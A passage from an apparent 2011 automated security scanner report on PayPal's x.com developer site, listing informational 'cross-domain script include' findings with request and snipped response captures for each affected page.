<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

7. Cross-domain script include
There are 258 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. https://www.x.com/blogs/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blogs/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=326233 t=1313157099727104
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.4. https://www.x.com/bookmarks/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /bookmarks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bookmarks/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=66839 t=1313157102611640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.5. https://www.x.com/community/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=326653 t=1313157029520695
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.6. https://www.x.com/community/emailPasswordToken!input.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=27233 t=1313157085132269
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.7. https://www.x.com/community/feeds

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/feeds HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=92546 t=1313157093104178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.8. https://www.x.com/community/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.9. https://www.x.com/community/ppx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.10. https://www.x.com/community/ppx/adaptive_accounts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.11. https://www.x.com/community/ppx/adaptive_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.12. https://www.x.com/community/ppx/apps101

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.13. https://www.x.com/community/ppx/authentication

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.14. https://www.x.com/community/ppx/businesspayments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.15. https://www.x.com/community/ppx/button_manager

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.16. https://www.x.com/community/ppx/code_samples

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.17. https://www.x.com/community/ppx/dev-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
